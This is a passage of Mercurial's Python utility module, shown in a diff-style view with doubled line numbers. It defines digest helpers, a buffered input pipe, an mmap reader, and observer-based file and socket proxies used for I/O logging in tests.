200 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
200 """
201 """
201 if _dowarn:
202 if _dowarn:
202 msg += (
203 msg += (
203 b"\n(compatibility will be dropped after Mercurial-%s,"
204 b"\n(compatibility will be dropped after Mercurial-%s,"
204 b" update your code.)"
205 b" update your code.)"
205 ) % version
206 ) % version
206 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
207 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
207 # on python 3 with chg, we will need to explicitly flush the output
208 # on python 3 with chg, we will need to explicitly flush the output
208 sys.stderr.flush()
209 sys.stderr.flush()
209
210
210
211
211 DIGESTS = {
212 DIGESTS = {
212 b'md5': hashlib.md5,
213 b'md5': hashlib.md5,
213 b'sha1': hashutil.sha1,
214 b'sha1': hashutil.sha1,
214 b'sha512': hashlib.sha512,
215 b'sha512': hashlib.sha512,
215 }
216 }
216 # List of digest types from strongest to weakest
217 # List of digest types from strongest to weakest
217 DIGESTS_BY_STRENGTH = [b'sha512', b'sha1', b'md5']
218 DIGESTS_BY_STRENGTH = [b'sha512', b'sha1', b'md5']
218
219
219 for k in DIGESTS_BY_STRENGTH:
220 for k in DIGESTS_BY_STRENGTH:
220 assert k in DIGESTS
221 assert k in DIGESTS
221
222
222
223
223 class digester(object):
224 class digester(object):
224 """helper to compute digests.
225 """helper to compute digests.
225
226
226 This helper can be used to compute one or more digests given their name.
227 This helper can be used to compute one or more digests given their name.
227
228
228 >>> d = digester([b'md5', b'sha1'])
229 >>> d = digester([b'md5', b'sha1'])
229 >>> d.update(b'foo')
230 >>> d.update(b'foo')
230 >>> [k for k in sorted(d)]
231 >>> [k for k in sorted(d)]
231 ['md5', 'sha1']
232 ['md5', 'sha1']
232 >>> d[b'md5']
233 >>> d[b'md5']
233 'acbd18db4cc2f85cedef654fccc4a4d8'
234 'acbd18db4cc2f85cedef654fccc4a4d8'
234 >>> d[b'sha1']
235 >>> d[b'sha1']
235 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
236 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
236 >>> digester.preferred([b'md5', b'sha1'])
237 >>> digester.preferred([b'md5', b'sha1'])
237 'sha1'
238 'sha1'
238 """
239 """
239
240
240 def __init__(self, digests, s=b''):
241 def __init__(self, digests, s=b''):
241 self._hashes = {}
242 self._hashes = {}
242 for k in digests:
243 for k in digests:
243 if k not in DIGESTS:
244 if k not in DIGESTS:
244 raise error.Abort(_(b'unknown digest type: %s') % k)
245 raise error.Abort(_(b'unknown digest type: %s') % k)
245 self._hashes[k] = DIGESTS[k]()
246 self._hashes[k] = DIGESTS[k]()
246 if s:
247 if s:
247 self.update(s)
248 self.update(s)
248
249
249 def update(self, data):
250 def update(self, data):
250 for h in self._hashes.values():
251 for h in self._hashes.values():
251 h.update(data)
252 h.update(data)
252
253
253 def __getitem__(self, key):
254 def __getitem__(self, key):
254 if key not in DIGESTS:
255 if key not in DIGESTS:
255 raise error.Abort(_(b'unknown digest type: %s') % k)
256 raise error.Abort(_(b'unknown digest type: %s') % k)
256 return nodemod.hex(self._hashes[key].digest())
257 return nodemod.hex(self._hashes[key].digest())
257
258
258 def __iter__(self):
259 def __iter__(self):
259 return iter(self._hashes)
260 return iter(self._hashes)
260
261
261 @staticmethod
262 @staticmethod
262 def preferred(supported):
263 def preferred(supported):
263 """returns the strongest digest type in both supported and DIGESTS."""
264 """returns the strongest digest type in both supported and DIGESTS."""
264
265
265 for k in DIGESTS_BY_STRENGTH:
266 for k in DIGESTS_BY_STRENGTH:
266 if k in supported:
267 if k in supported:
267 return k
268 return k
268 return None
269 return None
269
270
270
271
271 class digestchecker(object):
272 class digestchecker(object):
272 """file handle wrapper that additionally checks content against a given
273 """file handle wrapper that additionally checks content against a given
273 size and digests.
274 size and digests.
274
275
275 d = digestchecker(fh, size, {'md5': '...'})
276 d = digestchecker(fh, size, {'md5': '...'})
276
277
277 When multiple digests are given, all of them are validated.
278 When multiple digests are given, all of them are validated.
278 """
279 """
279
280
280 def __init__(self, fh, size, digests):
281 def __init__(self, fh, size, digests):
281 self._fh = fh
282 self._fh = fh
282 self._size = size
283 self._size = size
283 self._got = 0
284 self._got = 0
284 self._digests = dict(digests)
285 self._digests = dict(digests)
285 self._digester = digester(self._digests.keys())
286 self._digester = digester(self._digests.keys())
286
287
287 def read(self, length=-1):
288 def read(self, length=-1):
288 content = self._fh.read(length)
289 content = self._fh.read(length)
289 self._digester.update(content)
290 self._digester.update(content)
290 self._got += len(content)
291 self._got += len(content)
291 return content
292 return content
292
293
293 def validate(self):
294 def validate(self):
294 if self._size != self._got:
295 if self._size != self._got:
295 raise error.Abort(
296 raise error.Abort(
296 _(b'size mismatch: expected %d, got %d')
297 _(b'size mismatch: expected %d, got %d')
297 % (self._size, self._got)
298 % (self._size, self._got)
298 )
299 )
299 for k, v in self._digests.items():
300 for k, v in self._digests.items():
300 if v != self._digester[k]:
301 if v != self._digester[k]:
301 # i18n: first parameter is a digest name
302 # i18n: first parameter is a digest name
302 raise error.Abort(
303 raise error.Abort(
303 _(b'%s mismatch: expected %s, got %s')
304 _(b'%s mismatch: expected %s, got %s')
304 % (k, v, self._digester[k])
305 % (k, v, self._digester[k])
305 )
306 )
306
307
307
308
308 try:
309 try:
309 buffer = buffer
310 buffer = buffer
310 except NameError:
311 except NameError:
311
312
312 def buffer(sliceable, offset=0, length=None):
313 def buffer(sliceable, offset=0, length=None):
313 if length is not None:
314 if length is not None:
314 return memoryview(sliceable)[offset : offset + length]
315 return memoryview(sliceable)[offset : offset + length]
315 return memoryview(sliceable)[offset:]
316 return memoryview(sliceable)[offset:]
316
317
317
318
318 _chunksize = 4096
319 _chunksize = 4096
319
320
320
321
321 class bufferedinputpipe(object):
322 class bufferedinputpipe(object):
322 """a manually buffered input pipe
323 """a manually buffered input pipe
323
324
324 Python will not let us use buffered IO and lazy reading with 'polling' at
325 Python will not let us use buffered IO and lazy reading with 'polling' at
325 the same time. We cannot probe the buffer state and select will not detect
326 the same time. We cannot probe the buffer state and select will not detect
326 that data are ready to read if they are already buffered.
327 that data are ready to read if they are already buffered.
327
328
328 This class let us work around that by implementing its own buffering
329 This class let us work around that by implementing its own buffering
329 (allowing efficient readline) while offering a way to know if the buffer is
330 (allowing efficient readline) while offering a way to know if the buffer is
330 empty from the output (allowing collaboration of the buffer with polling).
331 empty from the output (allowing collaboration of the buffer with polling).
331
332
332 This class lives in the 'util' module because it makes use of the 'os'
333 This class lives in the 'util' module because it makes use of the 'os'
333 module from the python stdlib.
334 module from the python stdlib.
334 """
335 """
335
336
336 def __new__(cls, fh):
337 def __new__(cls, fh):
337 # If we receive a fileobjectproxy, we need to use a variation of this
338 # If we receive a fileobjectproxy, we need to use a variation of this
338 # class that notifies observers about activity.
339 # class that notifies observers about activity.
339 if isinstance(fh, fileobjectproxy):
340 if isinstance(fh, fileobjectproxy):
340 cls = observedbufferedinputpipe
341 cls = observedbufferedinputpipe
341
342
342 return super(bufferedinputpipe, cls).__new__(cls)
343 return super(bufferedinputpipe, cls).__new__(cls)
343
344
344 def __init__(self, input):
345 def __init__(self, input):
345 self._input = input
346 self._input = input
346 self._buffer = []
347 self._buffer = []
347 self._eof = False
348 self._eof = False
348 self._lenbuf = 0
349 self._lenbuf = 0
349
350
350 @property
351 @property
351 def hasbuffer(self):
352 def hasbuffer(self):
352 """True is any data is currently buffered
353 """True is any data is currently buffered
353
354
354 This will be used externally a pre-step for polling IO. If there is
355 This will be used externally a pre-step for polling IO. If there is
355 already data then no polling should be set in place."""
356 already data then no polling should be set in place."""
356 return bool(self._buffer)
357 return bool(self._buffer)
357
358
358 @property
359 @property
359 def closed(self):
360 def closed(self):
360 return self._input.closed
361 return self._input.closed
361
362
362 def fileno(self):
363 def fileno(self):
363 return self._input.fileno()
364 return self._input.fileno()
364
365
365 def close(self):
366 def close(self):
366 return self._input.close()
367 return self._input.close()
367
368
368 def read(self, size):
369 def read(self, size):
369 while (not self._eof) and (self._lenbuf < size):
370 while (not self._eof) and (self._lenbuf < size):
370 self._fillbuffer()
371 self._fillbuffer()
371 return self._frombuffer(size)
372 return self._frombuffer(size)
372
373
373 def unbufferedread(self, size):
374 def unbufferedread(self, size):
374 if not self._eof and self._lenbuf == 0:
375 if not self._eof and self._lenbuf == 0:
375 self._fillbuffer(max(size, _chunksize))
376 self._fillbuffer(max(size, _chunksize))
376 return self._frombuffer(min(self._lenbuf, size))
377 return self._frombuffer(min(self._lenbuf, size))
377
378
378 def readline(self, *args, **kwargs):
379 def readline(self, *args, **kwargs):
379 if len(self._buffer) > 1:
380 if len(self._buffer) > 1:
380 # this should not happen because both read and readline end with a
381 # this should not happen because both read and readline end with a
381 # _frombuffer call that collapse it.
382 # _frombuffer call that collapse it.
382 self._buffer = [b''.join(self._buffer)]
383 self._buffer = [b''.join(self._buffer)]
383 self._lenbuf = len(self._buffer[0])
384 self._lenbuf = len(self._buffer[0])
384 lfi = -1
385 lfi = -1
385 if self._buffer:
386 if self._buffer:
386 lfi = self._buffer[-1].find(b'\n')
387 lfi = self._buffer[-1].find(b'\n')
387 while (not self._eof) and lfi < 0:
388 while (not self._eof) and lfi < 0:
388 self._fillbuffer()
389 self._fillbuffer()
389 if self._buffer:
390 if self._buffer:
390 lfi = self._buffer[-1].find(b'\n')
391 lfi = self._buffer[-1].find(b'\n')
391 size = lfi + 1
392 size = lfi + 1
392 if lfi < 0: # end of file
393 if lfi < 0: # end of file
393 size = self._lenbuf
394 size = self._lenbuf
394 elif len(self._buffer) > 1:
395 elif len(self._buffer) > 1:
395 # we need to take previous chunks into account
396 # we need to take previous chunks into account
396 size += self._lenbuf - len(self._buffer[-1])
397 size += self._lenbuf - len(self._buffer[-1])
397 return self._frombuffer(size)
398 return self._frombuffer(size)
398
399
399 def _frombuffer(self, size):
400 def _frombuffer(self, size):
400 """return at most 'size' data from the buffer
401 """return at most 'size' data from the buffer
401
402
402 The data are removed from the buffer."""
403 The data are removed from the buffer."""
403 if size == 0 or not self._buffer:
404 if size == 0 or not self._buffer:
404 return b''
405 return b''
405 buf = self._buffer[0]
406 buf = self._buffer[0]
406 if len(self._buffer) > 1:
407 if len(self._buffer) > 1:
407 buf = b''.join(self._buffer)
408 buf = b''.join(self._buffer)
408
409
409 data = buf[:size]
410 data = buf[:size]
410 buf = buf[len(data) :]
411 buf = buf[len(data) :]
411 if buf:
412 if buf:
412 self._buffer = [buf]
413 self._buffer = [buf]
413 self._lenbuf = len(buf)
414 self._lenbuf = len(buf)
414 else:
415 else:
415 self._buffer = []
416 self._buffer = []
416 self._lenbuf = 0
417 self._lenbuf = 0
417 return data
418 return data
418
419
419 def _fillbuffer(self, size=_chunksize):
420 def _fillbuffer(self, size=_chunksize):
420 """read data to the buffer"""
421 """read data to the buffer"""
421 data = os.read(self._input.fileno(), size)
422 data = os.read(self._input.fileno(), size)
422 if not data:
423 if not data:
423 self._eof = True
424 self._eof = True
424 else:
425 else:
425 self._lenbuf += len(data)
426 self._lenbuf += len(data)
426 self._buffer.append(data)
427 self._buffer.append(data)
427
428
428 return data
429 return data
429
430
430
431
431 def mmapread(fp, size=None):
432 def mmapread(fp, size=None):
432 if size == 0:
433 if size == 0:
433 # size of 0 to mmap.mmap() means "all data"
434 # size of 0 to mmap.mmap() means "all data"
434 # rather than "zero bytes", so special case that.
435 # rather than "zero bytes", so special case that.
435 return b''
436 return b''
436 elif size is None:
437 elif size is None:
437 size = 0
438 size = 0
438 try:
439 try:
439 fd = getattr(fp, 'fileno', lambda: fp)()
440 fd = getattr(fp, 'fileno', lambda: fp)()
440 return mmap.mmap(fd, size, access=mmap.ACCESS_READ)
441 return mmap.mmap(fd, size, access=mmap.ACCESS_READ)
441 except ValueError:
442 except ValueError:
442 # Empty files cannot be mmapped, but mmapread should still work. Check
443 # Empty files cannot be mmapped, but mmapread should still work. Check
443 # if the file is empty, and if so, return an empty buffer.
444 # if the file is empty, and if so, return an empty buffer.
444 if os.fstat(fd).st_size == 0:
445 if os.fstat(fd).st_size == 0:
445 return b''
446 return b''
446 raise
447 raise
447
448
448
449
449 class fileobjectproxy(object):
450 class fileobjectproxy(object):
450 """A proxy around file objects that tells a watcher when events occur.
451 """A proxy around file objects that tells a watcher when events occur.
451
452
452 This type is intended to only be used for testing purposes. Think hard
453 This type is intended to only be used for testing purposes. Think hard
453 before using it in important code.
454 before using it in important code.
454 """
455 """
455
456
456 __slots__ = (
457 __slots__ = (
457 '_orig',
458 '_orig',
458 '_observer',
459 '_observer',
459 )
460 )
460
461
461 def __init__(self, fh, observer):
462 def __init__(self, fh, observer):
462 object.__setattr__(self, '_orig', fh)
463 object.__setattr__(self, '_orig', fh)
463 object.__setattr__(self, '_observer', observer)
464 object.__setattr__(self, '_observer', observer)
464
465
465 def __getattribute__(self, name):
466 def __getattribute__(self, name):
466 ours = {
467 ours = {
467 '_observer',
468 '_observer',
468 # IOBase
469 # IOBase
469 'close',
470 'close',
470 # closed if a property
471 # closed if a property
471 'fileno',
472 'fileno',
472 'flush',
473 'flush',
473 'isatty',
474 'isatty',
474 'readable',
475 'readable',
475 'readline',
476 'readline',
476 'readlines',
477 'readlines',
477 'seek',
478 'seek',
478 'seekable',
479 'seekable',
479 'tell',
480 'tell',
480 'truncate',
481 'truncate',
481 'writable',
482 'writable',
482 'writelines',
483 'writelines',
483 # RawIOBase
484 # RawIOBase
484 'read',
485 'read',
485 'readall',
486 'readall',
486 'readinto',
487 'readinto',
487 'write',
488 'write',
488 # BufferedIOBase
489 # BufferedIOBase
489 # raw is a property
490 # raw is a property
490 'detach',
491 'detach',
491 # read defined above
492 # read defined above
492 'read1',
493 'read1',
493 # readinto defined above
494 # readinto defined above
494 # write defined above
495 # write defined above
495 }
496 }
496
497
497 # We only observe some methods.
498 # We only observe some methods.
498 if name in ours:
499 if name in ours:
499 return object.__getattribute__(self, name)
500 return object.__getattribute__(self, name)
500
501
501 return getattr(object.__getattribute__(self, '_orig'), name)
502 return getattr(object.__getattribute__(self, '_orig'), name)
502
503
503 def __nonzero__(self):
504 def __nonzero__(self):
504 return bool(object.__getattribute__(self, '_orig'))
505 return bool(object.__getattribute__(self, '_orig'))
505
506
506 __bool__ = __nonzero__
507 __bool__ = __nonzero__
507
508
508 def __delattr__(self, name):
509 def __delattr__(self, name):
509 return delattr(object.__getattribute__(self, '_orig'), name)
510 return delattr(object.__getattribute__(self, '_orig'), name)
510
511
511 def __setattr__(self, name, value):
512 def __setattr__(self, name, value):
512 return setattr(object.__getattribute__(self, '_orig'), name, value)
513 return setattr(object.__getattribute__(self, '_orig'), name, value)
513
514
514 def __iter__(self):
515 def __iter__(self):
515 return object.__getattribute__(self, '_orig').__iter__()
516 return object.__getattribute__(self, '_orig').__iter__()
516
517
517 def _observedcall(self, name, *args, **kwargs):
518 def _observedcall(self, name, *args, **kwargs):
518 # Call the original object.
519 # Call the original object.
519 orig = object.__getattribute__(self, '_orig')
520 orig = object.__getattribute__(self, '_orig')
520 res = getattr(orig, name)(*args, **kwargs)
521 res = getattr(orig, name)(*args, **kwargs)
521
522
522 # Call a method on the observer of the same name with arguments
523 # Call a method on the observer of the same name with arguments
523 # so it can react, log, etc.
524 # so it can react, log, etc.
524 observer = object.__getattribute__(self, '_observer')
525 observer = object.__getattribute__(self, '_observer')
525 fn = getattr(observer, name, None)
526 fn = getattr(observer, name, None)
526 if fn:
527 if fn:
527 fn(res, *args, **kwargs)
528 fn(res, *args, **kwargs)
528
529
529 return res
530 return res
530
531
531 def close(self, *args, **kwargs):
532 def close(self, *args, **kwargs):
532 return object.__getattribute__(self, '_observedcall')(
533 return object.__getattribute__(self, '_observedcall')(
533 'close', *args, **kwargs
534 'close', *args, **kwargs
534 )
535 )
535
536
536 def fileno(self, *args, **kwargs):
537 def fileno(self, *args, **kwargs):
537 return object.__getattribute__(self, '_observedcall')(
538 return object.__getattribute__(self, '_observedcall')(
538 'fileno', *args, **kwargs
539 'fileno', *args, **kwargs
539 )
540 )
540
541
541 def flush(self, *args, **kwargs):
542 def flush(self, *args, **kwargs):
542 return object.__getattribute__(self, '_observedcall')(
543 return object.__getattribute__(self, '_observedcall')(
543 'flush', *args, **kwargs
544 'flush', *args, **kwargs
544 )
545 )
545
546
546 def isatty(self, *args, **kwargs):
547 def isatty(self, *args, **kwargs):
547 return object.__getattribute__(self, '_observedcall')(
548 return object.__getattribute__(self, '_observedcall')(
548 'isatty', *args, **kwargs
549 'isatty', *args, **kwargs
549 )
550 )
550
551
551 def readable(self, *args, **kwargs):
552 def readable(self, *args, **kwargs):
552 return object.__getattribute__(self, '_observedcall')(
553 return object.__getattribute__(self, '_observedcall')(
553 'readable', *args, **kwargs
554 'readable', *args, **kwargs
554 )
555 )
555
556
556 def readline(self, *args, **kwargs):
557 def readline(self, *args, **kwargs):
557 return object.__getattribute__(self, '_observedcall')(
558 return object.__getattribute__(self, '_observedcall')(
558 'readline', *args, **kwargs
559 'readline', *args, **kwargs
559 )
560 )
560
561
561 def readlines(self, *args, **kwargs):
562 def readlines(self, *args, **kwargs):
562 return object.__getattribute__(self, '_observedcall')(
563 return object.__getattribute__(self, '_observedcall')(
563 'readlines', *args, **kwargs
564 'readlines', *args, **kwargs
564 )
565 )
565
566
566 def seek(self, *args, **kwargs):
567 def seek(self, *args, **kwargs):
567 return object.__getattribute__(self, '_observedcall')(
568 return object.__getattribute__(self, '_observedcall')(
568 'seek', *args, **kwargs
569 'seek', *args, **kwargs
569 )
570 )
570
571
571 def seekable(self, *args, **kwargs):
572 def seekable(self, *args, **kwargs):
572 return object.__getattribute__(self, '_observedcall')(
573 return object.__getattribute__(self, '_observedcall')(
573 'seekable', *args, **kwargs
574 'seekable', *args, **kwargs
574 )
575 )
575
576
576 def tell(self, *args, **kwargs):
577 def tell(self, *args, **kwargs):
577 return object.__getattribute__(self, '_observedcall')(
578 return object.__getattribute__(self, '_observedcall')(
578 'tell', *args, **kwargs
579 'tell', *args, **kwargs
579 )
580 )
580
581
581 def truncate(self, *args, **kwargs):
582 def truncate(self, *args, **kwargs):
582 return object.__getattribute__(self, '_observedcall')(
583 return object.__getattribute__(self, '_observedcall')(
583 'truncate', *args, **kwargs
584 'truncate', *args, **kwargs
584 )
585 )
585
586
586 def writable(self, *args, **kwargs):
587 def writable(self, *args, **kwargs):
587 return object.__getattribute__(self, '_observedcall')(
588 return object.__getattribute__(self, '_observedcall')(
588 'writable', *args, **kwargs
589 'writable', *args, **kwargs
589 )
590 )
590
591
591 def writelines(self, *args, **kwargs):
592 def writelines(self, *args, **kwargs):
592 return object.__getattribute__(self, '_observedcall')(
593 return object.__getattribute__(self, '_observedcall')(
593 'writelines', *args, **kwargs
594 'writelines', *args, **kwargs
594 )
595 )
595
596
596 def read(self, *args, **kwargs):
597 def read(self, *args, **kwargs):
597 return object.__getattribute__(self, '_observedcall')(
598 return object.__getattribute__(self, '_observedcall')(
598 'read', *args, **kwargs
599 'read', *args, **kwargs
599 )
600 )
600
601
601 def readall(self, *args, **kwargs):
602 def readall(self, *args, **kwargs):
602 return object.__getattribute__(self, '_observedcall')(
603 return object.__getattribute__(self, '_observedcall')(
603 'readall', *args, **kwargs
604 'readall', *args, **kwargs
604 )
605 )
605
606
606 def readinto(self, *args, **kwargs):
607 def readinto(self, *args, **kwargs):
607 return object.__getattribute__(self, '_observedcall')(
608 return object.__getattribute__(self, '_observedcall')(
608 'readinto', *args, **kwargs
609 'readinto', *args, **kwargs
609 )
610 )
610
611
611 def write(self, *args, **kwargs):
612 def write(self, *args, **kwargs):
612 return object.__getattribute__(self, '_observedcall')(
613 return object.__getattribute__(self, '_observedcall')(
613 'write', *args, **kwargs
614 'write', *args, **kwargs
614 )
615 )
615
616
616 def detach(self, *args, **kwargs):
617 def detach(self, *args, **kwargs):
617 return object.__getattribute__(self, '_observedcall')(
618 return object.__getattribute__(self, '_observedcall')(
618 'detach', *args, **kwargs
619 'detach', *args, **kwargs
619 )
620 )
620
621
621 def read1(self, *args, **kwargs):
622 def read1(self, *args, **kwargs):
622 return object.__getattribute__(self, '_observedcall')(
623 return object.__getattribute__(self, '_observedcall')(
623 'read1', *args, **kwargs
624 'read1', *args, **kwargs
624 )
625 )
625
626
626
627
627 class observedbufferedinputpipe(bufferedinputpipe):
628 class observedbufferedinputpipe(bufferedinputpipe):
628 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
629 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
629
630
630 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
631 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
631 bypass ``fileobjectproxy``. Because of this, we need to make
632 bypass ``fileobjectproxy``. Because of this, we need to make
632 ``bufferedinputpipe`` aware of these operations.
633 ``bufferedinputpipe`` aware of these operations.
633
634
634 This variation of ``bufferedinputpipe`` can notify observers about
635 This variation of ``bufferedinputpipe`` can notify observers about
635 ``os.read()`` events. It also re-publishes other events, such as
636 ``os.read()`` events. It also re-publishes other events, such as
636 ``read()`` and ``readline()``.
637 ``read()`` and ``readline()``.
637 """
638 """
638
639
639 def _fillbuffer(self):
640 def _fillbuffer(self):
640 res = super(observedbufferedinputpipe, self)._fillbuffer()
641 res = super(observedbufferedinputpipe, self)._fillbuffer()
641
642
642 fn = getattr(self._input._observer, 'osread', None)
643 fn = getattr(self._input._observer, 'osread', None)
643 if fn:
644 if fn:
644 fn(res, _chunksize)
645 fn(res, _chunksize)
645
646
646 return res
647 return res
647
648
648 # We use different observer methods because the operation isn't
649 # We use different observer methods because the operation isn't
649 # performed on the actual file object but on us.
650 # performed on the actual file object but on us.
650 def read(self, size):
651 def read(self, size):
651 res = super(observedbufferedinputpipe, self).read(size)
652 res = super(observedbufferedinputpipe, self).read(size)
652
653
653 fn = getattr(self._input._observer, 'bufferedread', None)
654 fn = getattr(self._input._observer, 'bufferedread', None)
654 if fn:
655 if fn:
655 fn(res, size)
656 fn(res, size)
656
657
657 return res
658 return res
658
659
659 def readline(self, *args, **kwargs):
660 def readline(self, *args, **kwargs):
660 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
661 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
661
662
662 fn = getattr(self._input._observer, 'bufferedreadline', None)
663 fn = getattr(self._input._observer, 'bufferedreadline', None)
663 if fn:
664 if fn:
664 fn(res)
665 fn(res)
665
666
666 return res
667 return res
667
668
668
669
669 PROXIED_SOCKET_METHODS = {
670 PROXIED_SOCKET_METHODS = {
670 'makefile',
671 'makefile',
671 'recv',
672 'recv',
672 'recvfrom',
673 'recvfrom',
673 'recvfrom_into',
674 'recvfrom_into',
674 'recv_into',
675 'recv_into',
675 'send',
676 'send',
676 'sendall',
677 'sendall',
677 'sendto',
678 'sendto',
678 'setblocking',
679 'setblocking',
679 'settimeout',
680 'settimeout',
680 'gettimeout',
681 'gettimeout',
681 'setsockopt',
682 'setsockopt',
682 }
683 }
683
684
684
685
685 class socketproxy(object):
686 class socketproxy(object):
686 """A proxy around a socket that tells a watcher when events occur.
687 """A proxy around a socket that tells a watcher when events occur.
687
688
688 This is like ``fileobjectproxy`` except for sockets.
689 This is like ``fileobjectproxy`` except for sockets.
689
690
690 This type is intended to only be used for testing purposes. Think hard
691 This type is intended to only be used for testing purposes. Think hard
691 before using it in important code.
692 before using it in important code.
692 """
693 """
693
694
694 __slots__ = (
695 __slots__ = (
695 '_orig',
696 '_orig',
696 '_observer',
697 '_observer',
697 )
698 )
698
699
699 def __init__(self, sock, observer):
700 def __init__(self, sock, observer):
700 object.__setattr__(self, '_orig', sock)
701 object.__setattr__(self, '_orig', sock)
701 object.__setattr__(self, '_observer', observer)
702 object.__setattr__(self, '_observer', observer)
702
703
703 def __getattribute__(self, name):
704 def __getattribute__(self, name):
704 if name in PROXIED_SOCKET_METHODS:
705 if name in PROXIED_SOCKET_METHODS:
705 return object.__getattribute__(self, name)
706 return object.__getattribute__(self, name)
706
707
707 return getattr(object.__getattribute__(self, '_orig'), name)
708 return getattr(object.__getattribute__(self, '_orig'), name)
708
709
709 def __delattr__(self, name):
710 def __delattr__(self, name):
710 return delattr(object.__getattribute__(self, '_orig'), name)
711 return delattr(object.__getattribute__(self, '_orig'), name)
711
712
712 def __setattr__(self, name, value):
713 def __setattr__(self, name, value):
713 return setattr(object.__getattribute__(self, '_orig'), name, value)
714 return setattr(object.__getattribute__(self, '_orig'), name, value)
714
715
715 def __nonzero__(self):
716 def __nonzero__(self):
716 return bool(object.__getattribute__(self, '_orig'))
717 return bool(object.__getattribute__(self, '_orig'))
717
718
718 __bool__ = __nonzero__
719 __bool__ = __nonzero__
719
720
720 def _observedcall(self, name, *args, **kwargs):
721 def _observedcall(self, name, *args, **kwargs):
721 # Call the original object.
722 # Call the original object.
722 orig = object.__getattribute__(self, '_orig')
723 orig = object.__getattribute__(self, '_orig')
723 res = getattr(orig, name)(*args, **kwargs)
724 res = getattr(orig, name)(*args, **kwargs)
724
725
725 # Call a method on the observer of the same name with arguments
726 # Call a method on the observer of the same name with arguments
726 # so it can react, log, etc.
727 # so it can react, log, etc.
727 observer = object.__getattribute__(self, '_observer')
728 observer = object.__getattribute__(self, '_observer')
728 fn = getattr(observer, name, None)
729 fn = getattr(observer, name, None)
729 if fn:
730 if fn:
730 fn(res, *args, **kwargs)
731 fn(res, *args, **kwargs)
731
732
732 return res
733 return res
733
734
734 def makefile(self, *args, **kwargs):
735 def makefile(self, *args, **kwargs):
735 res = object.__getattribute__(self, '_observedcall')(
736 res = object.__getattribute__(self, '_observedcall')(
736 'makefile', *args, **kwargs
737 'makefile', *args, **kwargs
737 )
738 )
738
739
739 # The file object may be used for I/O. So we turn it into a
740 # The file object may be used for I/O. So we turn it into a
740 # proxy using our observer.
741 # proxy using our observer.
741 observer = object.__getattribute__(self, '_observer')
742 observer = object.__getattribute__(self, '_observer')
742 return makeloggingfileobject(
743 return makeloggingfileobject(
743 observer.fh,
744 observer.fh,
744 res,
745 res,
745 observer.name,
746 observer.name,
746 reads=observer.reads,
747 reads=observer.reads,
747 writes=observer.writes,
748 writes=observer.writes,
748 logdata=observer.logdata,
749 logdata=observer.logdata,
749 logdataapis=observer.logdataapis,
750 logdataapis=observer.logdataapis,
750 )
751 )
751
752
752 def recv(self, *args, **kwargs):
753 def recv(self, *args, **kwargs):
753 return object.__getattribute__(self, '_observedcall')(
754 return object.__getattribute__(self, '_observedcall')(
754 'recv', *args, **kwargs
755 'recv', *args, **kwargs
755 )
756 )
756
757
757 def recvfrom(self, *args, **kwargs):
758 def recvfrom(self, *args, **kwargs):
758 return object.__getattribute__(self, '_observedcall')(
759 return object.__getattribute__(self, '_observedcall')(
759 'recvfrom', *args, **kwargs
760 'recvfrom', *args, **kwargs
760 )
761 )
761
762
762 def recvfrom_into(self, *args, **kwargs):
763 def recvfrom_into(self, *args, **kwargs):
763 return object.__getattribute__(self, '_observedcall')(
764 return object.__getattribute__(self, '_observedcall')(
764 'recvfrom_into', *args, **kwargs
765 'recvfrom_into', *args, **kwargs
765 )
766 )
766
767
767 def recv_into(self, *args, **kwargs):
768 def recv_into(self, *args, **kwargs):
768 return object.__getattribute__(self, '_observedcall')(
769 return object.__getattribute__(self, '_observedcall')(
769 'recv_info', *args, **kwargs
770 'recv_info', *args, **kwargs
770 )
771 )
771
772
772 def send(self, *args, **kwargs):
773 def send(self, *args, **kwargs):
773 return object.__getattribute__(self, '_observedcall')(
774 return object.__getattribute__(self, '_observedcall')(
774 'send', *args, **kwargs
775 'send', *args, **kwargs
775 )
776 )
776
777
777 def sendall(self, *args, **kwargs):
778 def sendall(self, *args, **kwargs):
778 return object.__getattribute__(self, '_observedcall')(
779 return object.__getattribute__(self, '_observedcall')(
779 'sendall', *args, **kwargs
780 'sendall', *args, **kwargs
780 )
781 )
781
782
782 def sendto(self, *args, **kwargs):
783 def sendto(self, *args, **kwargs):
783 return object.__getattribute__(self, '_observedcall')(
784 return object.__getattribute__(self, '_observedcall')(
784 'sendto', *args, **kwargs
785 'sendto', *args, **kwargs
785 )
786 )
786
787
787 def setblocking(self, *args, **kwargs):
788 def setblocking(self, *args, **kwargs):
788 return object.__getattribute__(self, '_observedcall')(
789 return object.__getattribute__(self, '_observedcall')(
789 'setblocking', *args, **kwargs
790 'setblocking', *args, **kwargs
790 )
791 )
791
792
792 def settimeout(self, *args, **kwargs):
793 def settimeout(self, *args, **kwargs):
793 return object.__getattribute__(self, '_observedcall')(
794 return object.__getattribute__(self, '_observedcall')(
794 'settimeout', *args, **kwargs
795 'settimeout', *args, **kwargs
795 )
796 )
796
797
797 def gettimeout(self, *args, **kwargs):
798 def gettimeout(self, *args, **kwargs):
798 return object.__getattribute__(self, '_observedcall')(
799 return object.__getattribute__(self, '_observedcall')(
799 'gettimeout', *args, **kwargs
800 'gettimeout', *args, **kwargs
800 )
801 )
801
802
802 def setsockopt(self, *args, **kwargs):
803 def setsockopt(self, *args, **kwargs):
803 return object.__getattribute__(self, '_observedcall')(
804 return object.__getattribute__(self, '_observedcall')(
804 'setsockopt', *args, **kwargs
805 'setsockopt', *args, **kwargs
805 )
806 )
806
807
807
808
808 class baseproxyobserver(object):
809 class baseproxyobserver(object):
809 def __init__(self, fh, name, logdata, logdataapis):
810 def __init__(self, fh, name, logdata, logdataapis):
810 self.fh = fh
811 self.fh = fh
811 self.name = name
812 self.name = name
812 self.logdata = logdata
813 self.logdata = logdata
813 self.logdataapis = logdataapis
814 self.logdataapis = logdataapis
814
815
815 def _writedata(self, data):
816 def _writedata(self, data):
816 if not self.logdata:
817 if not self.logdata:
817 if self.logdataapis:
818 if self.logdataapis:
818 self.fh.write(b'\n')
819 self.fh.write(b'\n')
819 self.fh.flush()
